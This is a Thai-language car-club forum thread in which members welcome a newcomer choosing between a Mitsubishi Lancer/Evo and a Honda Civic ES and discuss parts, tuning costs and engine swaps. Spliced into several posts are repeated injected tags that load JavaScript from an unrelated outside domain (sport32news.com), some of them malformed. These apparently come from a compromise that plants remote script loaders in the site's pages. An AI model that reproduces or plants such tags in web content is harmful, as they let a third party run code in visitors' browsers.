ตอบ
pannatad

ชื่อเล่น: ปุ๋ย

เข้าร่วม: 19 เมษา 2011
ตอบ: 1900

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1742
ให้คำขอบคุณ: 751

ปี: 2003
พุธ, 15 สิงหา 2012 10:00 - แอบด่อม ๆ ย่องๆ เข้ามาเงียบๆ ครับ หุๆ
ถอยรถมาเกือบห้าแสน ทำเพิ่มไปน่าจะร่วมสองแสนละ -*-
ได้รับคำขอบคุณจาก: kim_possible 
poon

เข้าร่วม: 07 กรกฎา 2012
ตอบ: 127

มือใหม่หัดขับ

ได้รับคำขอบคุณ: 90
ให้คำขอบคุณ: 137
พุธ, 15 สิงหา 2012 10:10 - แอบด่อม ๆ ย่องๆ เข้ามาเงียบๆ ครับ หุๆ
hacker พิมพ์ว่า:
ตอนแรกผมก็คลั่งไคล้ Evolution เข้าสายเลือดเหมือนกันครับ

ถ้าจะจัด ES เต็มๆ ผมว่า ราคาไล่ๆกับจะแปลง ซีเดีย เป็นอิโวลูชั่น มั้งครับ

แต่ถ้าจะเอาแค่ภายนอก ES น่าจะกินหลายขุม (เพราะทำได้แค่ตีโป่งเจาะแก้ม ไม่ต้องเปลี่ยนหน้้าเปลี่ยนท้าย )

เรื่องอะไหล่ กับ ของแต่ง มันหายากจิงครับ

แต่ผมก็คิดไม่ออกว่ามันมีอะไรมั่ง

โช้ค 

เบรค

เบาะ

แมกซ์

ผมก็ว่ามันยัดได้กับหลายรุ่นนะ ลองมาฝังตัวดู ES อีกซักระยะก็ได้ครับ ช่อง "ค้นหา" ข้อมูลเพียบ

++++++1 ค่ะ ตอนนี้ใจก้อมาทาง ES เยอะเลย "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: hacker  kim_possible 
puyzaaaaa

ชื่อเล่น: ปุ่ย

เข้าร่วม: 10 เมษา 2011
ตอบ: 3008

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3014
ให้คำขอบคุณ: 3113

ปี: 2004
พุธ, 15 สิงหา 2012 12:00 - แอบด่อม ๆ ย่องๆ เข้ามาเงียบๆ ครับ หุๆ
ติดกับ แล้วครับ... 
ได้รับคำขอบคุณจาก: hacker  kim_possible 
pongz19

ชื่อเล่น: โป้ง

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1168

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 859
ให้คำขอบคุณ: 489

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 15 สิงหา 2012 12:06 - แอบด่อม ๆ ย่องๆ เข้ามาเงียบๆ ครับ หุๆ
มาถูกที่แล้ว
ได้รับคำขอบคุณจาก: kim_possible 
newcolor

เข้าร่วม: 10 กรกฎา 2010
ตอบ: 989

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2374
ให้คำขอบคุณ: 3894
พุธ, 15 สิงหา 2012 12:56 - แอบด่อม ๆ ย่องๆ เข้ามาเงียบๆ ครับ หุๆ
ยินดีต้อนรับครับผม
The_One

เข้าร่วม: 30 พฤษภาคม 2010
ตอบ: 761

Guru ES
Guru ES

ได้รับคำขอบคุณ: 340
ให้คำขอบคุณ: 112

สี: ฟ้า ไอซ์บูล (เมทัลลิก) (B-506M)
พุธ, 15 สิงหา 2012 13:15 - แอบด่อม ๆ ย่องๆ เข้ามาเงียบๆ ครับ หุๆ
ลองค้นหา ศึกษาดูคับ แล้วจะรู้ว่า ไม่ผิดหวังที่เลือก ES
hacker

ชื่อเล่น: เซียนจ๊อบ

เข้าร่วม: 03 ตุลา 2008
ตอบ: 4046

ผู้ชนะเลิศการแข่งขัน ES Drag war 2011
ผู้ชนะเลิศการแข่งขัน ES Drag war 2011

ได้รับคำขอบคุณ: 10965
ให้คำขอบคุณ: 22797

พุธ, 15 สิงหา 2012 13:59 - แอบด่อม ๆ ย่องๆ เข้ามาเงียบๆ ครับ หุๆ
~ สเตฟาน ~ พิมพ์ว่า:
ยินดี และ ดีใจ ที่ES เป็นส่วนหนึ่งที่คุณอยากได้นะครับ ^^

ก่อนอื่นต้องถามตัวคุณเองก่อนว่า อยากแต่งให้หล่อ หรือ อยากแต่งให้แรง หรือ อยากทั้งหล่อทั้งแรง

อยากแต่งให้หล่อ ยอมรับครับว่า ESเป็นรุ่นที่หาของแต่งของตัวเองยากอยู่ ต้องไปขอหยิบยืมจากรุ่นพี่เช่น DC5 / EP3 และของแต่งแต่ละชิ้น ราคาก็เอาเรื่องอยู่เหมือนกัน อยู่ที่ความพร้อมและความชอบ / และถ้าชอบตีโป่งแบบEVO คงต้องลองดูรถพี่เอกประวัติ(รถแข่งจริงในสนาม)เป็นต้นแบบได้เลยครับ

อยากแต่งให้แรง มีตั้งแต่Stepเครื่องเดิมๆ เกียร์ธรรมดา เปลี่ยนปลายท่อ เปลี่ยนเฟืองท้าย พ่วงกล่อง เปลี่ยนแคม 9ล9 (ราคาคร่าวๆโดยประมาณนะครับ ก็แตะๆแสน+-)  แต่ถ้าเครื่องเดิมไม่สนองความแรงได้ ก็คงต้องหาตระกูล K ฝาแดงมายัดลงแหละครับ (ราคาคร่าวๆ ของมาครบ รวมค่าวาง ก็สามแสน +-)

อยากแต่งให้หล่อและอยากแต่งให้แรง ก็ลองคำนวณจาก2แนวทางข้างต้นดูครับ

ก็ลองศึกษาหาข้อมูลในบอร์ดดูนะครับ ใจเย็นๆ เก็บข้อมูลไป แล้วคุณจะหลงรักESเพิ่มขึ้นอีกเย๊อะเลย ^^

นานๆมาตอบที ดันมาตอบแบบมีสาระอีกนะ ผิดฟอร์มหว่ะ
ได้รับคำขอบคุณจาก: ~ สเตฟาน ~  kim_possible 
taeducier

ชื่อเล่น: เต้นะ

เข้าร่วม: 19 มกรา 2010
ตอบ: 1659

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2492
ให้คำขอบคุณ: 248

พุธ, 15 สิงหา 2012 16:32 - แอบด่อม ๆ ย่องๆ เข้ามาเงียบๆ ครับ หุๆ
แอบด่อม ๆ ย่องๆ เข้ามาเงียบๆ ครับ  หุๆ

แอบด่อม ๆ ย่องๆ เข้ามาเงียบๆ ครับ  หุๆ
ถ้าผมจะออกรถมือ 1 จะ เลือก Lancer Ex ครับ...แต่ไม่มีปัญญา

แต่ Lancer แต่งยังไงๆ มันก็ไปในแนวทาง Evo

ซึ่ง Es มันไปได้หลากหลายกว่า...นะในความคิด

(ถ้ารวยจะไป Spoon ทั้งคัน) ........อ๊ากกกก Ex โหดดดดจังวะะะ
ได้รับคำขอบคุณจาก: poon  es330  kim_possible 
LnwwasaD

ชื่อเล่น: เฟริท

เข้าร่วม: 10 เมษา 2012
ตอบ: 3543

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2843
ให้คำขอบคุณ: 2957

พุธ, 15 สิงหา 2012 17:19 - แอบด่อม ๆ ย่องๆ เข้ามาเงียบๆ ครับ หุๆ
จัด es ไปเลยครับบบบบบ   อยากหล่อ ก็ จัดเหยี่ยวไปเลย  .... เชียร์   ES ครับ ........
Modzilla14

เข้าร่วม: 18 ตุลา 2011
ตอบ: 214

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 232
ให้คำขอบคุณ: 354

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 15 สิงหา 2012 17:46 - แอบด่อม ๆ ย่องๆ เข้ามาเงียบๆ ครับ หุๆ
ES มีครบทุกอย่างที่คุณอยากได้ครับ
boymac

เข้าร่วม: 25 มิถุนา 2009
ตอบ: 906

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 996
ให้คำขอบคุณ: 231

ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 15 สิงหา 2012 18:02 - แอบด่อม ๆ ย่องๆ เข้ามาเงียบๆ ครับ หุๆ
เดิมไม่ค่อยแบนด์ Mitsu อยู่แล้วครับ มันเหมือนเครื่องใช้ในบ้านยังงัยไม่รู้ 5555 ลองมาขับ ES. ดูอะไหล่ไม่แพงอย่างที่คิดหรือไม่ขาดเหลือไรขอพี่ๆในนี้ได้
koranat

ชื่อเล่น: แช้ม แช้มป

เข้าร่วม: 15 มิถุนา 2012
ตอบ: 186

ได้รับคำขอบคุณ: 136
ให้คำขอบคุณ: 8

สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 15 สิงหา 2012 18:07 - แอบด่อม ๆ ย่องๆ เข้ามาเงียบๆ ครับ หุๆ
ฟิวภายใน อีเอส หล่อกว่าเยอะครับ ลอง ขับดู แล้วคุนจะรู้ว่าไม่ธรรมดา สปอต์นิด นิด ระยะยาว ตกรุ่นช้ากว่ามิตซุแน่นอน 
tewada

ชื่อเล่น: ต้น

เข้าร่วม: 15 กันยา 2009
ตอบ: 489

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 546
ให้คำขอบคุณ: 456

สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 15 สิงหา 2012 18:38 - แอบด่อม ๆ ย่องๆ เข้ามาเงียบๆ ครับ หุๆ
ดูแล้ว ลองแล้ว ขับแล้ว ..... จะรัก ES ครับ

EAK_75

ชื่อเล่น: เอก

ตอบ: 1647

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1476
ให้คำขอบคุณ: 828

ปี: 2001
พุธ, 15 สิงหา 2012 22:34 - แอบด่อม ๆ ย่องๆ เข้ามาเงียบๆ ครับ หุๆ
ชอบทั้ง 2 แบรน์ ก่อนมาใช้ ES ก็ E CAR มาก่อน หลังจากท้ายเบ้นแล้ว ผมว่าไม่ค่อยสวยแล้วครับ ลองมาใช้ ES ดูครับ หล่อๆ
lonemind

เข้าร่วม: 14 สิงหา 2012
ตอบ: 5

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 47
ให้คำขอบคุณ: 1
พฤหัส, 16 สิงหา 2012 02:54 - แอบด่อม ๆ ย่องๆ เข้ามาเงียบๆ ครับ หุๆ
ต้อนรับกันอบอุ่นเวอร์อ่ะ   Civic Es เขาต้อนรับกันอย่างนี้เลยหรอ  บอร์ดแรกนะเนี๊ยที่มีสมาชิกเข้ามาต้อนรับกันแบบนี้  ทีแรกกะจะเข้ามาถามเอาข้อมูลเล็กๆน้อยๆ  นี่ยกพลกันเข้ามาต้อนรับแบบนี้  ปลื้มเลยครับ แต่ละคนมีแต่คนน้ำใจงามๆ (หน้าตาดีด้วยนะ)  ให้กำลังใจดีมากครับ

LifeFate พิมพ์ว่า:
แล้ว จะหลงรัก ES ครับ

รักแล้วครับๆ 55+
birthday1987 พิมพ์ว่า:
http://www.civicesgroup.com/forum/topic16415?sid=

นี่แหละครับที่ผมกำลังค้นหาอยู่   วูปแรกผมมองไปที่โปร่ง และ ล้อกับแม็ก  นึกถึง Evo แว๊ปนึง 55   หล่อมากครับ 
Ryuknight พิมพ์ว่า:
ผมคนนึง ที่ไปเล่น Lancer club มาเพราะชอบตัวท้ายเบนซ์ กับซีเดีย
ไปๆ มาๆ ผู้ใหญ่ให้ลองขับ ES หลังจากนั้นก็เลยได้ขับมาและซื้อมาใช้ครับ

นั่งไงมาจากที่เดียวกัน 55+ พี่ก็คงจะเป็นผู้ใหญ่ให้ผมเหมือนกันนะ ฮ่ะๆ
ibank100 พิมพ์ว่า:
ESเดิมๆ แม็กซักชุดก็หล่อแล้วครับ 

ใช่ๆครับ
bankabby พิมพ์ว่า:
 เชียร์ ES สุดใจจ้า

ผมก็เชียร์ Es เหมือนกันครับ 55+ เชียร์ให้ผบ.ผมอนุมัตินะฮ่ะๆๆๆ
wangyu พิมพ์ว่า:

civic es 
civic es
civic es

เชียร์ขาดใจดิ้นเลยครับ

Thanks  มากมายครับ 
3drom พิมพ์ว่า:
es แต่งไม่ต้องมากมายก็หล่อแล้วครับ ผมขับมาตั้งแต่ป้ายแดงปี 03 ไม่เคยมีความคิดที่จะขายสักครั้งครับ คิดเอาละกัน

นี่ก็ปาไป จะ 10 ปีแล้ว คอนเฟริมกันขนาดนี้ Es ขาดใจครับ
voravit visanbannavit พิมพ์ว่า:
..

..  ขอบคุณมากครับ ฮ่ะๆ ถึงจะไม่รู้ว่าหมายถึงอะไร 
zan พิมพ์ว่า:
es อะไหล่ไม่แพงหรอกครับ
ของก็หาไม่ยากแล้วเดี๋ยวนี้
ของแต่งเล่นก็มีพอสมควร  ถึงจะเยอะสู้รุ่นอื่นๆ ใน Honda ไม่ได้ก็ตาม
(เช่น EG , EK , FD)

แต่ถ้าจะแต่งให้แรง  ไปยากหน่อย คงต้องลงเครื่องถึงจะสะใจ

ถ้าชอบแนวแต่งแบบนี้  ลองแต่งตามรถพี่เอกประวัติเลยครับ เอาให้สุด

แฟนก็เชียร์ FD นะ แต่ด้วยแรง Money เรา ผมว่า ตัว Es นี่ Ok เลยครับ  สวยโฉบเบียดๆตัว FD เลย
ตอนแรกผมก็คลั่งไคล้ Evolution เข้าสายเลือดเหมือนกันครับ

ถ้าจะจัด ES เต็มๆ ผมว่า ราคาไล่ๆกับจะแปลง ซีเดีย เป็นอิโวลูชั่น มั้งครับ

แต่ถ้าจะเอาแค่ภายนอก ES น่าจะกินหลายขุม (เพราะทำได้แค่ตีโป่งเจาะแก้ม ไม่ต้องเปลี่ยนหน้้าเปลี่ยนท้าย )

เรื่องอะไหล่ กับ ของแต่ง มันหายากจิงครับ

แต่ผมก็คิดไม่ออกว่ามันมีอะไรมั่ง

โช้ค 

เบรค

เบาะ

แมกซ์

ผมก็ว่ามันยัดได้กับหลายรุ่นนะ ลองมาฝังตัวดู ES อีกซักระยะก็ได้ครับ ช่อง "ค้นหา" ข้อมูลเพียบ

นั่นไง มากจากที่เดียวกันอีกคน  จริงถ้าไปศึกษามันลึกๆ นะ เจ้า Evo เนี๊ย เหมือนยาเสพติด  จะเงยหน้าไม่ขึ้นเลย  แต่ดูที่ต้นทุนการจะไปให้ถึง มัน เห็นเม็ดเงินแล้วท้อครับ ถ้าจะซื้อ Evo แท้เลย  ราคามันเท่ากับ รถป้ายแดงทุกวันนี้เลย   ผมก็คงจะเดินสายเดียวกันละครับ  Es หล่อสูสีกันครับ 
ES2.0 พิมพ์ว่า:
ที่นี่ไม่ใช่แค่คลับของคนที่ใช้รถรุ่นเดียวกันเฉยๆนะ
ที่นี่มีมากกว่านั้นมันเป็นครอบครัวๆนึง ซึ่งผมเองก็
เข้ามาที่นี่ทุกวันทั้งที่ผมขายรถไปแล้ว ลองดูคับ ES
อะหลั่ยไม่แพงอย่างที่คิดหรอก แต่ของแต่งนี่แหละ
ตัวดีเลย ถ้าเทียบกับปั้นอีโวผมว่าถูกกว่านะ ^^

ใช่ครับ  ดูจากการต้อนรับ สุดๆครับ   อืม งั้นถอยอีกรอบพร้อมกันเลยปะครับ 55+
Autosomo พิมพ์ว่า:
มาเชียร์ es อีกเสียงครับ แล้วคุณจะหลงใหลมัน

ขอบคุณครับสำหรับคะแนนเสียง อิอิ
surasaka พิมพ์ว่า:
เชียร์ es ด้วยครับ

ขอบคุณครับ
nayyai1 พิมพ์ว่า:
จัด ES ได้เลยครับ  อย่าลังเล  อะไหล่ค่อยๆหาเอาในคลับของเราเลยครับ

ขอบคุณอีกเสียงนะครับ  ผมก็คิดว่าอะไหล่หาเองคงยาก  มีพรรคพวกในบอร์ดเยอะๆ อะไหล่คงไกล้แค่เอื้อมครับ
underhill พิมพ์ว่า:
ผมก็เข้าไปอยู่นะ lancer club กะ lancer ex club ไม่ใช่อะไรหาป้ายข้าง 

นั่งไงอีกคน จากบ้านเก่า จริงๆตอนนี้ผมก็คิดอยูนะ ถ้าเก็บตังค์ทันก็คงจะ lancer Ex นะ  ชอบเหมือนกันแต่ติดตรงที่ ผบ. ไม่อนุมัติครับ ผบ.ผมชอบ  Civic 55+  ผบ.บอกว่า  lancer Ex หน้าหมู ม้ายเอา   ผมละเซง  55+ คนอื่นเขาว่าฉลาม  ผบ.ผม บอกหน้าหมู อือ จบกัน 

Chonchy พิมพ์ว่า:
ของผมก็เคยไปจับ EVO3 มาอยู่พักนึง...ชอบเหมือนกันคับ...แต่ขยับขยายมาเล่น ES...อิอิ

เหอะๆ เจออีกคนละ  จากฟิ้วๆๆ  มาเป็นแนวหล่อๆเงียบๆ 555+ ขอบคุณครับ

poon พิมพ์ว่า:

แอบมาจากที่เดียวกันเลยค่ะ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></

เจออีกคนละ 55+ ผมเริ่มจะชอบ Es มากขึ้นละ
song พิมพ์ว่า:
ลองดู แล้วคุณจะติดใจ

ติดหนึบแล้วครับ  หุๆ  ขอบคุณครับ
ยินดี และ ดีใจ ที่ES เป็นส่วนหนึ่งที่คุณอยากได้นะครับ ^^

ก่อนอื่นต้องถามตัวคุณเองก่อนว่า อยากแต่งให้หล่อ หรือ อยากแต่งให้แรง หรือ อยากทั้งหล่อทั้งแรง

อยากแต่งให้หล่อ ยอมรับครับว่า ESเป็นรุ่นที่หาของแต่งของตัวเองยากอยู่ ต้องไปขอหยิบยืมจากรุ่นพี่เช่น DC5 / EP3 และของแต่งแต่ละชิ้น ราคาก็เอาเรื่องอยู่เหมือนกัน อยู่ที่ความพร้อมและความชอบ / และถ้าชอบตีโป่งแบบEVO คงต้องลองดูรถพี่เอกประวัติ(รถแข่งจริงในสนาม)เป็นต้นแบบได้เลยครับ

อยากแต่งให้แรง มีตั้งแต่Stepเครื่องเดิมๆ เกียร์ธรรมดา เปลี่ยนปลายท่อ เปลี่ยนเฟืองท้าย พ่วงกล่อง เปลี่ยนแคม 9ล9 (ราคาคร่าวๆโดยประมาณนะครับ ก็แตะๆแสน+-)  แต่ถ้าเครื่องเดิมไม่สนองความแรงได้ ก็คงต้องหาตระกูล K ฝาแดงมายัดลงแหละครับ (ราคาคร่าวๆ ของมาครบ รวมค่าวาง ก็สามแสน +-)

อยากแต่งให้หล่อและอยากแต่งให้แรง ก็ลองคำนวณจาก2แนวทางข้างต้นดูครับ

ก็ลองศึกษาหาข้อมูลในบอร์ดดูนะครับ ใจเย็นๆ เก็บข้อมูลไป แล้วคุณจะหลงรักESเพิ่มขึ้นอีกเย๊อะเลย ^^

นี่ไงที่ผมกำลังตามหา  ขอบคุณสำหรับข้อมูลแน่นๆ อีกรอบครับ  ถ้าได้มาก็คงจะแนว สวยนอก เดิมในอ่ะครับ  ผมไม่ใช่แนวซิ่งครับ ขับไม่เกิน 120  ขับรถมีน้ำใจครับ ปลอดภัยก่อนดีกว่า
DuuI พิมพ์ว่า:
ก่อนอื่นต้องกล่าวคำว่ายินดีต้อนรับสู่ civicesgroup ครับ

ท่านประธานมาตอบทุกอย่างชัดเจนแล้ว

สุดท้ายต้องตัดสินใจเอง ว่าจะเลือกอะไร

แต่บอกได้แค่ว่า ถ้าเลือก ES รับรองว่าไม่ผิดหวัง

อั๊ยยะ  คนมะกี๋ประธานหรอครับ   ฝากขอบคุณอีกรอบเลยละกัน   เกรงใจจังครับ  ขอบคุณคุณ DuuI ด้วยนะครับ อีก 1เสียง อิอิ
mashimabo พิมพ์ว่า:
ขอ บอก นะ ครับ ว่า ต้อง ลอง ...........

ฟัง เค้า เล่า มา ไม่ สนุก หรอก นะ ครับ ..........

ขับ ES สาว เยอะ ครับ .........หล่อ กัน ทั้ง นั้น .....

ยินดีต้อนรับด้วยคนครับ ...........

อืมชอบที่รถสวย  ขับดีครับ ส่วน สาวเยอะนี่  คงจะขัดกับนโยบายผบ. ผม 555+  ขอบคุณอีกครั้งครับ
donniiez พิมพ์ว่า:
สมัยวัยรุ่น อีโว เป็นอะไรที่ชอบมากๆ เป็นความฝันเลย แต่พอจะซื้อรถเข้าจริงไม่รู้ทำไมตัวเลือกผมไม่มีมิตซูเลย สงสัยเพราะกลัวซื้อมาไม่มีงบแต่ง

นั่นซิครับ  ตอนนี้ผมก็คงอยู่ในช่วงนั้นยังไงก็ขอขอบคุณข้อมูลดีๆ นะครับพี่
mosonic พิมพ์ว่า:
ใจ มาน ร๊าก  

ขอบคุณครับ
momoSTANDBY พิมพ์ว่า:
ผมขาย FD ยังมา ซื้อ ES เลย อิอิ

โห นี่เอากันงี้เลยหรอ  55+  ขอบคุณครับผม
WarHighways พิมพ์ว่า:
ขอพื้นที่นิดนึงครับ.....
คันแรกออกป้ายแดงก็ ES 02......ประสบอุบัติเหตุ เอาไปขายซาก คนรอด
คันที่2 มือสอง ก็ ES 04....- ปัจจุบันครับ

ส่วนตัวก็ชอบ Lancer ครับ.....แต่เมื่อให้เลือก   ES มาก่อนครับ เรียกว่าหลงไหล รุ่นนี้ครับ
ยิ่งได้มารู้จัก club นี้แล้ว  ถอนตัวยากซะแล้ว ด้วยมิตรภาพ สาระต่างๆ กูรู ที่พร้อมจะแก้ปัญหาให้กับท่าน 
เรียนเชิญ จขกท. มาแชร์กันครับ แล้วท่านจะไม่ผิดหวัง

"<script src="https://sport32news.com/civicesgroup.js">

ดีใจด้วยนะครับที่ไม่เป็นอะไรจากอุบัติเหติมาก ยังไงก็ขับระมัดระวังด้วยนะครับ ต้อนรับกันดีแบบนี้ถอนตัวยากแน่ๆเลยครับ  ยินดีที่จะแชร์เลยครับ  55+  แต่เป็นข้อมูล Mitsu นะ 55+
popza4 พิมพ์ว่า:
es es es

ขอบคุณ 1 คะแนนเสียงครับ 
wishgame พิมพ์ว่า:
มีเท่าไรให้หมดกระเป๋าเลย  ไม่มีอะไรดีเท่านี้แล้ว หรือ หมดไปเยอะแล้ว 555+

รถผมไม่ค่อยหล่อ แต่วิ่งเครื่องเดิม ไม่อาย 1 โบเลยล่ะคับ

ทำมาก็หมดไปประมาณ 50000-60000 บาท ได้ล่ะมั้งแรงอย่างเดียวนะคับ

หล่ออีกตั้งหาก ตอนนี้ ใกล้จะเต็มแล้วกับเครื่องเดิม  ค่องใจสงสัยถามปรึกษาได้นะคับ.....

ขอบคุณอย่างยิ่งเลยครับ นี่ทุ่มไปอย่างนี้ รถแรงก็ระมัดระวังด้วยนะครับ ชักเริ่มจะอยากให้เปิดฝากกระโปรงแล้วละครับ  55+ 
aunbao พิมพ์ว่า:
ES หล่อครับ ลองแล้วจะติดใจ

ขอบคุณครับ สำหรับ 1 คะแนนเสียงดีๆ

ขอบคุณท่านสมาชิกทุกท่านเลยนะครับ  นั่งขอบคุณมาสุดทางเลย   เฮ้อเหนื่อยกายแต่ไม่เหนื่อยใจครับ

ได้รับคำขอบคุณจาก: WarHighways  hacker  es330  kim_possible 
WarHighways

ชื่อเล่น: วาร์

เข้าร่วม: 04 มิถุนา 2012
ตอบ: 1283

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1312
ให้คำขอบคุณ: 1463

พฤหัส, 16 สิงหา 2012 02:59 - แอบด่อม ๆ ย่องๆ เข้ามาเงียบๆ ครับ หุๆ
ด้วยความยินดีคร้าบบ.. นี่แหล่ะครับ เสน่ห์(เขียนงี้ถูกป่าว)     ของ   CIVIC ES GROUP 

ได้รับคำขอบคุณจาก: es330 
lonemind

น้องใหม่
น้องใหม่

พฤหัส, 16 สิงหา 2012 03:19 - แอบด่อม ๆ ย่องๆ เข้ามาเงียบๆ ครับ หุๆ
ภาคต่อเลยละกัน ไหนก็ไหนๆ เอาให้ครบเลยละกัน  5+++

pannatad พิมพ์ว่า:
ถอยรถมาเกือบห้าแสน ทำเพิ่มไปน่าจะร่วมสองแสนละ -*-

ผมจะตามหาใน Gallery  จะเข้าไปติดตามชมแน่นอนครับ ขอบคุณครับ

poon พิมพ์ว่า:

โช้ค 

เบรค

เบาะ

แมกซ์

++++++1 ค่ะ ตอนนี้ใจก้อมาทาง ES เยอะเลย "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">

ขอบคุณครับ ที่ร่วมเชียร์รถสวยๆ ดีๆแบบนี้ครับ ขอบคุณอีกครั้งครับ 

puyzaaaaa พิมพ์ว่า:
ติดกับ แล้วครับ... 

หนึบเลย  อิอิ  ขอบคุณครับ 
pongz19 พิมพ์ว่า:
มาถูกที่แล้ว

ขอบคุณครับ  สำหรับ 1 คะแนนเสียง
newcolor พิมพ์ว่า:
ยินดีต้อนรับครับผม

รถหล่อมากเลยครับ  เดี๋ยวจะเข้าไปตามหาใน Gaallery ครับ  ขอบคุณมากครับ  

The_One พิมพ์ว่า:
ลองค้นหา ศึกษาดูคับ แล้วจะรู้ว่า ไม่ผิดหวังที่เลือก ES

ครับผม  ขอบคุณครับ 

นานๆมาตอบที ดันมาตอบแบบมีสาระอีกนะ ผิดฟอร์มหว่ะ

ผมโครตเกรงใจเลยครับ  นี่ถึงประธานเข้ามาตอบที  ขอบคุณ ทั้งสองท่านมากเลยนะครับ 
อ้างอิงจาก:
taeducier
ถ้าผมจะออกรถมือ 1 จะ เลือก Lancer Ex ครับ...แต่ไม่มีปัญญา

แต่ Lancer แต่งยังไงๆ มันก็ไปในแนวทาง Evo

ซึ่ง Es มันไปได้หลากหลายกว่า...นะในความคิด

(ถ้ารวยจะไป Spoon ทั้งคัน) ........อ๊ากกกก Ex โหดดดดจังวะะะ

แนะ เอา Ex มายั่วกันอีกละ  เดี๋ยวเหอะ  55+  นี่กำลังจะทำใจได้นะ  55+  ขอเวลาทำใจนิสนึง หุๆ
LnwwasaD พิมพ์ว่า:
จัด es ไปเลยครับบบบบบ   อยากหล่อ ก็ จัดเหยี่ยวไปเลย  .... เชียร์   ES ครับ ........

ครับผม ขอบคุณสำหรับ 1 คะแนนเสียงดีๆ   นี่แหละครับ  ตาเหยี่ยว ผมติดตามชื่อนี้ก่อนจะ เจอคำว่า Es ซะอีกครับ 555+
Modzilla14 พิมพ์ว่า:
ES มีครบทุกอย่างที่คุณอยากได้ครับ

ขอบคุณจาก 1 คะแนนเสียงดีๆครับ 

เดี๋ยวๆ พักยกแปป นึง 55    ....................................................  มะ ไปกันต่อ 

boymac พิมพ์ว่า:
เดิมไม่ค่อยแบนด์ Mitsu อยู่แล้วครับ มันเหมือนเครื่องใช้ในบ้านยังงัยไม่รู้ 5555 ลองมาขับ ES. ดูอะไหล่ไม่แพงอย่างที่คิดหรือไม่ขาดเหลือไรขอพี่ๆในนี้ได้

ใช่ครับผม  ผู้ใหญ่หลายคนก็คิดแบบนี้เหมือนกันนะ เหมือนเครื่องใช้ไฟฟ้าว่างั้น 55+ <script src="https://sport32news.com/civicesgroup.js"></  ขอบคุณสำหรับ 1 คะแนนเสียงดีๆ ครับ 
koranat พิมพ์ว่า:
ฟิวภายใน อีเอส หล่อกว่าเยอะครับ ลอง ขับดู แล้วคุนจะรู้ว่าไม่ธรรมดา สปอต์นิด นิด ระยะยาว ตกรุ่นช้ากว่ามิตซุแน่นอน 

ช้ายเลยครับ ในข้อนี้  ขอบคุณอีกครั้งครับ 

tewada พิมพ์ว่า:
ดูแล้ว ลองแล้ว ขับแล้ว ..... จะรัก ES ครับ

ขอบคุณมาอีก 1 คะแนนเสียง  คับผม
Eak_ES พิมพ์ว่า:
ชอบทั้ง 2 แบรน์ ก่อนมาใช้ ES ก็ E CAR มาก่อน หลังจากท้ายเบ้นแล้ว ผมว่าไม่ค่อยสวยแล้วครับ ลองมาใช้ ES ดูครับ หล่อๆ

อาวหรอครับ  ฮ่ะๆ ส่วนผม ชอบตั้งแต่ ท้ายเบนซื ขึ้นมาถึง Ex  ( แนว 5-10 ครับ )   ขอบคุณสำหรับ 1 เสียงดีๆครับ 

ยังไงก็ฝากขอบคุณ ท่านประมาณบอร์ดที่แวะเข้ามาเยี่ยมชมอีกรอบนะครับ และขอบคุณท่านสมาชิกทุกท่านที่แวะเข้ามา  หากกระทู้นี้ทำให้ท่านเสียเวลาอ่าน ก็ขออภัย ณ ที่นี้ด้วยนะครับ  ขอตัวไปคลิ๊กดู รถใน Gallery ต่อก่อนนะคับ อิอิ

ได้รับคำขอบคุณจาก: WarHighways  hacker 
poon

เข้าร่วม: 07 กรกฎา 2012
ตอบ: 127

ได้รับคำขอบคุณ: 90
ให้คำขอบคุณ: 137
พฤหัส, 16 สิงหา 2012 15:17 - แอบด่อม ๆ ย่องๆ เข้ามาเงียบๆ ครับ หุๆ
taeducier พิมพ์ว่า:

+1 ค่ะะะะะ
ได้รับคำขอบคุณจาก: hacker 
hacker

ชื่อเล่น: เซียนจ๊อบ

เข้าร่วม: 03 ตุลา 2008
ตอบ: 4046

ได้รับคำขอบคุณ: 10965
ให้คำขอบคุณ: 22797

พฤหัส, 16 สิงหา 2012 15:40 - แอบด่อม ๆ ย่องๆ เข้ามาเงียบๆ ครับ หุๆ
หลังจากคุณคลุกคลีกับ ES ได้ซักพัก คุณจะมุ่งหน้าไปหา Type-R อย่าง DC5 ก็เป็นได้ รุ่นนี้ พอฟัดพอเหวี่ยงกับ Evo เลยแหละ

แต่ลากยาวกินขาดเพราะ N/A 
PongpanG

ชื่อเล่น: ป๋องแป๋ง

เข้าร่วม: 11 สิงหา 2008
ตอบ: 3254

Moderator
Moderator

ได้รับคำขอบคุณ: 12524
ให้คำขอบคุณ: 3239

สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 17 สิงหา 2012 10:31 - แอบด่อม ๆ ย่องๆ เข้ามาเงียบๆ ครับ หุๆ
โป่ง แบบนี้ สวยนะครับ  วาง K20A เต็มครับคันนี้

ได้รับคำขอบคุณจาก: lonemind  es330 
lonemind

น้องใหม่
น้องใหม่

อังคาร, 9 ตุลา 2012 16:29 - แอบด่อม ๆ ย่องๆ เข้ามาเงียบๆ ครับ หุๆ
PongpanG พิมพ์ว่า:
